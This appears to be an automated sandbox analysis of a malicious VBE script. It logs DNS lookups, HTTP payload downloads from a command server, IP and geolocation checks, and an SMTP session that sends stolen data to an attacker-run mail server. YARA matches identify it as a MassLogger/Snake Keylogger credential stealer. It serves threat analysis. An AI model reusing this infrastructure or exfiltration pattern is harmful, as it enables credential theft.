Nov 18, 2024 13:44:30.299009085 CET | 192.168.2.4 | 1.1.1.1 | 0xd817 | Standard query (0) | jertcot.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 18, 2024 13:44:22.152060986 CET | 1.1.1.1 | 192.168.2.4 | 0x1429 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 13:44:22.152060986 CET | 1.1.1.1 | 192.168.2.4 | 0x1429 | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:44:22.152060986 CET | 1.1.1.1 | 192.168.2.4 | 0x1429 | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:44:22.152060986 CET | 1.1.1.1 | 192.168.2.4 | 0x1429 | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:44:22.152060986 CET | 1.1.1.1 | 192.168.2.4 | 0x1429 | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:44:22.152060986 CET | 1.1.1.1 | 192.168.2.4 | 0x1429 | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:44:23.298178911 CET | 1.1.1.1 | 192.168.2.4 | 0x9dc9 | No error (0) | reallyfreegeoip.org |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:44:23.298178911 CET | 1.1.1.1 | 192.168.2.4 | 0x9dc9 | No error (0) | reallyfreegeoip.org |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 13:44:30.312438965 CET | 1.1.1.1 | 192.168.2.4 | 0xd817 | No error (0) | jertcot.shop |  | 162.254.34.31 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• 144.91.79.54
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 144.91.79.54 | 80 | 7064 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 13:42:58.911454916 CET | 152 | OUT | GET /1211/s HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: 144.91.79.54
Nov 18, 2024 13:42:59.776099920 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Mon, 18 Nov 2024 12:42:59 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Wed, 02 Oct 2024 01:26:13 GMT
ETag: "6ab0-6237452d358f3"
Accept-Ranges: bytes
Content-Length: 27312
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
                                                            Nov 18, 2024 13:43:00.099411011 CET | 152 | OUT | GET /1211/r HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                            Host: 144.91.79.54
                                                            Nov 18, 2024 13:43:00.351298094 CET | 1236 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:43:00 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                            Last-Modified: Wed, 09 Oct 2024 05:50:42 GMT
                                                            ETag: "9800-62404d5968a93"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 38912
                                                            Keep-Alive: timeout=5, max=99
                                                            Connection: Keep-Alive
                                                            Nov 18, 2024 13:43:00.661837101 CET | 175 | OUT | GET /1211/upcYWNLeVWW8atGcZt0Z.txt HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                            Host: 144.91.79.54
                                                            Nov 18, 2024 13:43:00.914413929 CET | 1236 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:43:00 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                            Last-Modified: Sun, 17 Nov 2024 22:24:33 GMT
                                                            ETag: "2dc00-6272343b4fbfa"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 187392
                                                            Keep-Alive: timeout=5, max=98
                                                            Connection: Keep-Alive
                                                            Content-Type: text/plain
                                                            Nov 18, 2024 13:43:02.004076004 CET | 153 | OUT | GET /1211/cn HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                            Host: 144.91.79.54
                                                            Nov 18, 2024 13:43:02.256324053 CET | 347 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:43:02 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                            Last-Modified: Sat, 09 Nov 2024 16:14:35 GMT
                                                            ETag: "42-6267d29e174cb"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 66
                                                            Keep-Alive: timeout=5, max=97
                                                            Connection: Keep-Alive
                                                            Data Raw: 35 33 37 34 36 46 37 30 32 44 35 30 37 32 36 46 36 33 36 35 37 33 37 33 32 30 32 44 34 45 36 31 36 44 36 35 32 30 36 33 36 46 36 45 36 38 36 46 37 33 37 34 32 30 32 44 34 36 36 46 37 32 36 33 36 35
                                                            Data Ascii: 53746F702D50726F63657373202D4E616D6520636F6E686F7374202D466F726365


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.4 | 49731 | 144.91.79.54 | 80 | 7064 | C:\Windows\System32\wscript.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 18, 2024 13:43:11.721355915 CET | 152 | OUT | GET /1211/v HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                            Host: 144.91.79.54
                                                            Nov 18, 2024 13:43:12.774035931 CET | 762 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:43:12 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                            Last-Modified: Wed, 25 Sep 2024 15:44:42 GMT
                                                            ETag: "1de-622f3802a248c"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 478
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Nov 18, 2024 13:43:12.784064054 CET | 762 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:43:12 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                            Last-Modified: Wed, 25 Sep 2024 15:44:42 GMT
                                                            ETag: "1de-622f3802a248c"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 478
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.4 | 49732 | 144.91.79.54 | 80 | 7064 | C:\Windows\System32\wscript.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 18, 2024 13:43:13.131473064 CET | 155 | OUT | GET /1211/file HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Accept: */*
                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                            Host: 144.91.79.54
                                                            Nov 18, 2024 13:43:13.991144896 CET | 1236 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:43:13 GMT
                                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                            Last-Modified: Tue, 12 Nov 2024 13:34:41 GMT
                                                            ETag: "f70-626b7478f5049"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 3952
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.4 | 49883 | 193.122.6.168 | 80 | 5184 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 18, 2024 13:44:22.169620037 CET | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
                                                            Nov 18, 2024 13:44:23.024297953 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:44:22 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 91c9ca2e14ffcbbd8fd9851d92fb627c
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                                            Nov 18, 2024 13:44:23.032669067 CET | 127 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Nov 18, 2024 13:44:23.277934074 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:44:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 1e2c8d4031f1b01e0c6ccaaa5949c947
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                                            Nov 18, 2024 13:44:23.515419006 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:44:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 1e2c8d4031f1b01e0c6ccaaa5949c947
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
                                                            Nov 18, 2024 13:44:30.042268991 CET | 127 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Nov 18, 2024 13:44:30.289416075 CET | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:44:30 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: f93c9973bcb31de4ae210d433ec6b951
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            0 | 192.168.2.4 | 49889 | 188.114.96.3 | 443 | 5184 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-11-18 12:44:24 UTC | 87 | OUT | GET /xml/155.94.241.187 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-11-18 12:44:24 UTC | 856 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 18 Nov 2024 12:44:24 GMT
                                                            Content-Type: text/xml
                                                            Content-Length: 358
                                                            Connection: close
                                                            Cache-Control: max-age=31536000
                                                            CF-Cache-Status: HIT
                                                            Age: 35347
                                                            Last-Modified: Mon, 18 Nov 2024 02:55:17 GMT
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=omeh%2B35g8ae5ChTvL0vHVOqajy9omHxvabaH%2FzRT%2F6rvziKEUq%2BUBK6jsyUhIhbU9AqF5keze7yLU9AAHwypPEF2h6N8wxIsihhWqmzbFblXzHr1G78U%2FSoREu%2BQElZDFBZIScTh"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e480d3c8a308d27-DFW
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1333&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2052445&cwnd=251&unsent_bytes=0&cid=c2d681f38d1cdf89&ts=360&x=0"
                                                            2024-11-18 12:44:24 UTC | 358 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a
                                                            Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                            Nov 18, 2024 13:44:31.160269022 CET | 587 | 49932 | 162.254.34.31 | 192.168.2.4 | 220 server1.educt.shop127.0.0.1 ESMTP Postfix
                                                            Nov 18, 2024 13:44:31.160506010 CET | 49932 | 587 | 192.168.2.4 | 162.254.34.31 | EHLO 721680
                                                            Nov 18, 2024 13:44:31.343144894 CET | 587 | 49932 | 162.254.34.31 | 192.168.2.4 | 250-server1.educt.shop127.0.0.1
                                                            250-PIPELINING
                                                            250-SIZE 204800000
                                                            250-ETRN
                                                            250-STARTTLS
                                                            250-AUTH PLAIN LOGIN
                                                            250-AUTH=PLAIN LOGIN
                                                            250-ENHANCEDSTATUSCODES
                                                            250-8BITMIME
                                                            250-DSN
                                                            250 CHUNKING
                                                            Nov 18, 2024 13:44:31.344428062 CET | 49932 | 587 | 192.168.2.4 | 162.254.34.31 | AUTH login c2VuZHhtYWZmbGVAamVydGNvdC5zaG9w
                                                            Nov 18, 2024 13:44:31.524661064 CET | 587 | 49932 | 162.254.34.31 | 192.168.2.4 | 334 UGFzc3dvcmQ6
                                                            Nov 18, 2024 13:44:31.722270012 CET | 587 | 49932 | 162.254.34.31 | 192.168.2.4 | 235 2.7.0 Authentication successful
                                                            Nov 18, 2024 13:44:31.722564936 CET | 49932 | 587 | 192.168.2.4 | 162.254.34.31 | MAIL FROM:<sendxmaffle@jertcot.shop>
                                                            Nov 18, 2024 13:44:31.912738085 CET | 587 | 49932 | 162.254.34.31 | 192.168.2.4 | 250 2.1.0 Ok
                                                            Nov 18, 2024 13:44:31.913013935 CET | 49932 | 587 | 192.168.2.4 | 162.254.34.31 | RCPT TO:<maffle@jertcot.shop>
                                                            Nov 18, 2024 13:44:32.096177101 CET | 587 | 49932 | 162.254.34.31 | 192.168.2.4 | 250 2.1.5 Ok
                                                            Nov 18, 2024 13:44:32.097791910 CET | 49932 | 587 | 192.168.2.4 | 162.254.34.31 | DATA
                                                            Nov 18, 2024 13:44:32.277010918 CET | 587 | 49932 | 162.254.34.31 | 192.168.2.4 | 354 End data with <CR><LF>.<CR><LF>
                                                            Nov 18, 2024 13:44:32.277796984 CET | 49932 | 587 | 192.168.2.4 | 162.254.34.31 | .
                                                            Nov 18, 2024 13:44:32.470141888 CET | 587 | 49932 | 162.254.34.31 | 192.168.2.4 | 250 2.0.0 Ok: queued as 056406448A


                                                            Target ID:0
                                                            Start time:07:42:58
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ref#150062.vbe"
                                                            Imagebase:0x7ff62eb20000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:07:43:12
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs"
                                                            Imagebase:0x7ff62eb20000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:07:44:01
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\pcPseOUmXnpEaeF.vbs"
                                                            Imagebase:0x7ff62eb20000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:6
                                                            Start time:07:44:02
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:07:44:02
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:07:44:04
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\rundll32.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                            Imagebase:0x7ff7ff030000
                                                            File size:71'680 bytes
                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:07:44:18
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:07:44:18
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:07:44:21
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                            Imagebase:0xd90000
                                                            File size:45'984 bytes
                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.2949838278.0000000001162000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.2951280494.0000000003206000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:14
                                                            Start time:07:44:22
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\wermgr.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "7064" "2696" "2648" "2700" "0" "0" "2704" "0" "0" "0" "0" "0"
                                                            Imagebase:0x7ff783f90000
                                                            File size:229'728 bytes
                                                            MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:07:44:22
                                                            Start date:18/11/2024
                                                            Path:C:\Windows\System32\wermgr.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "1888" "2588" "2776" "2068" "0" "0" "2076" "0" "0" "0" "0" "0"
                                                            Imagebase:0x7ff783f90000
                                                            File size:229'728 bytes
                                                            MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:12.7%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:7.3%
                                                              Total number of Nodes:247
                                                              Total number of Limit Nodes:14
                                                              execution_graph 32230 5bfb698 32231 5bfb6de 32230->32231 32235 5bfb878 32231->32235 32238 5bfb868 32231->32238 32232 5bfb7cb 32242 5bfb5d4 32235->32242 32239 5bfb878 32238->32239 32240 5bfb5d4 DuplicateHandle 32239->32240 32241 5bfb8a6 32240->32241 32241->32232 32243 5bfb8e0 DuplicateHandle 32242->32243 32244 5bfb8a6 32243->32244 32244->32232 32245 16146d8 32246 16146e4 32245->32246 32252 1618031 32246->32252 32247 1614713 32248 1614721 32247->32248 32257 5bfa990 32247->32257 32261 5bfa981 32247->32261 32253 161804c 32252->32253 32265 1618268 32253->32265 32271 1618259 32253->32271 32254 1618058 32254->32247 32258 5bfa99f 32257->32258 32293 5bfa538 32258->32293 32262 5bfa990 32261->32262 32263 5bfa538 4 API calls 32262->32263 32264 5bfa9c0 32263->32264 32264->32248 32266 161828a 32265->32266 32267 1618356 32266->32267 32277 161ed68 32266->32277 32281 161f36c 32266->32281 32287 161ef88 32266->32287 32267->32254 32272 1618268 32271->32272 32273 1618356 32272->32273 32274 161ed68 LdrInitializeThunk 32272->32274 32275 161ef88 2 API calls 32272->32275 32276 161f36c 2 API calls 32272->32276 32273->32254 32274->32273 32275->32273 32276->32273 32278 161ed7f 32277->32278 32279 161ed7a 32277->32279 32278->32279 32280 161f4a9 LdrInitializeThunk 32278->32280 32279->32267 32280->32279 32282 161f223 32281->32282 32283 161f364 LdrInitializeThunk 32282->32283 32286 161ed68 LdrInitializeThunk 32282->32286 32285 161f4c1 32283->32285 32285->32267 32286->32282 32289 161efb9 32287->32289 32288 161f119 32288->32267 32289->32288 32291 161f364 LdrInitializeThunk 32289->32291 32292 161ed68 LdrInitializeThunk 32289->32292 32291->32288 32292->32289 32296 5bfa543 32293->32296 32295 5bfc34e 32297 5bfb66c 32296->32297 32298 5bfb677 32297->32298 32299 5bfca74 32298->32299 32302 5bfe6d1 32298->32302 32307 5bfe700 32298->32307 32299->32295 32303 5bfe6da 32302->32303 32304 5bfe69a 32303->32304 32312 5bfe89f 32303->32312 32316 5bfe8b0 
